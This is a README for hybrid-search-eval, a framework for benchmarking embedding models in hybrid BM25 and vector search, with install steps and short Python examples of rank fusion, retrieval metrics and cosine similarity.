Welcome to the hybrid-search-eval project! This framework helps you test and compare different embedding models in hybrid search setups. If you want to improve your search results with ease, you are in the right place.
Before you download, ensure your system meets these requirements:
- Operating System: Windows, macOS, or Linux
- Memory: At least 4 GB RAM
- Storage: 200 MB of available disk space
- Network: Stable internet connection for downloads and updates
- Combine traditional search methods (like BM25) with advanced vector search.
- Evaluate models using various metrics.
- User-friendly interface designed for seamless navigation.
- Support for popular embedding models and libraries.
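To give a feel for how lexical and vector results can be combined, here is a minimal sketch of reciprocal rank fusion (RRF), one common fusion method for hybrid search. The function name, document IDs, and rankings are illustrative examples, not part of this tool's API.

```python
def rrf(rankings, k=60):
    """Fuse several ranked lists of doc IDs into a single ranking.

    Each document's fused score is the sum of 1 / (k + rank) over
    every list it appears in; k=60 is a commonly used constant.
    """
    scores = {}
    for ranking in rankings:
        for rank, doc_id in enumerate(ranking, start=1):
            scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank)
    # Highest fused score first.
    return sorted(scores, key=scores.get, reverse=True)

# Hypothetical results from the two retrievers:
bm25_ranking = ["d1", "d3", "d2"]      # lexical (BM25) order
vector_ranking = ["d2", "d1", "d4"]    # embedding-based order
fused = rrf([bm25_ranking, vector_ranking])
```

Documents that rank well in both lists (like d1 here) rise to the top of the fused ranking, which is the main appeal of rank-based fusion: it needs no score normalization between the two retrievers.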
To get started, follow these steps:
1. Visit the Releases Page: Click the link below to go to the download page: Download hybrid-search-eval.

2. Select the Latest Version: On the Releases page, find the most recent release. You will see various files available for download.

3. Choose Your File: Pick the file best suited for your operating system. For example:
   - For Windows, download the file ending in .exe.
   - For macOS, download the file ending in .dmg.
   - For Linux, download the release archive for your platform.

4. Download and Install:
   - Windows: Double-click the downloaded .exe file to start the installation, then follow the on-screen instructions.
   - macOS: Open the .dmg file and drag the application to your Applications folder.
   - Linux: Extract the downloaded archive and run the included script.
Once you complete the installation, follow these steps to benchmark your embedding models.
1. Open the Application: Locate the application icon in your applications menu and click to open it.

2. Select Your Dataset: Choose the dataset you want to use for evaluation. Make sure it is formatted correctly for input.

3. Choose Models: Select the embedding models you want to benchmark. You can pick multiple models for comparison.

4. Run the Evaluation: Click the "Start Evaluation" button. The application will process the models and provide results.

5. View Results: Once the evaluation is complete, review the results displayed on your screen. You can analyze the efficiency and accuracy of each model.
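For intuition about what the reported numbers mean, here is a hedged sketch of two metrics such evaluations typically include: mean reciprocal rank (MRR) and recall@k. The query IDs, rankings, and relevance labels are made-up examples; the actual metrics and data formats depend on the tool.

```python
def mean_reciprocal_rank(results, qrels):
    """Average of 1/rank of the first relevant document per query."""
    total = 0.0
    for qid, ranking in results.items():
        relevant = qrels.get(qid, set())
        for rank, doc_id in enumerate(ranking, start=1):
            if doc_id in relevant:
                total += 1.0 / rank
                break
    return total / len(results)

def recall_at_k(results, qrels, k):
    """Average fraction of relevant documents found in the top k."""
    total = 0.0
    for qid, ranking in results.items():
        relevant = qrels.get(qid, set())
        if relevant:
            total += len(set(ranking[:k]) & relevant) / len(relevant)
    return total / len(results)

# Hypothetical run: two queries, one relevant document each.
results = {"q1": ["d2", "d1"], "q2": ["d5", "d4"]}
qrels = {"q1": {"d1"}, "q2": {"d5"}}
```

On this toy data, MRR is 0.75 (the relevant document is at rank 2 for q1 and rank 1 for q2) and recall@1 is 0.5, which illustrates why comparing models on several metrics at once is useful.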
For more detailed instructions, FAQs, and advanced usage, please refer to our full documentation on GitHub Wiki.
- Weaviate Documentation: Learn more about the vector search engine.
- MTEB (Massive Text Embedding Benchmark): Explore evaluation benchmarks for embedding models.
- Sentence Transformers: Discover tools for sentence embeddings.
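Embeddings produced by libraries like Sentence Transformers are usually compared with cosine similarity. As a self-contained sketch (the vectors here are tiny made-up examples; real models emit hundreds of dimensions):

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

# Identical directions score 1.0; orthogonal directions score 0.0.
same = cosine_similarity([1.0, 0.0], [1.0, 0.0])
orthogonal = cosine_similarity([1.0, 0.0], [0.0, 1.0])
```

Because cosine similarity ignores vector magnitude, it is a natural fit for embedding models whose outputs are (or can be) normalized to unit length.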
If you encounter issues or have questions, please open an issue on the GitHub Issues Page. We strive to respond quickly and help you resolve any problems.
Thank you for using hybrid-search-eval! Enjoy improving your search models with this practical framework.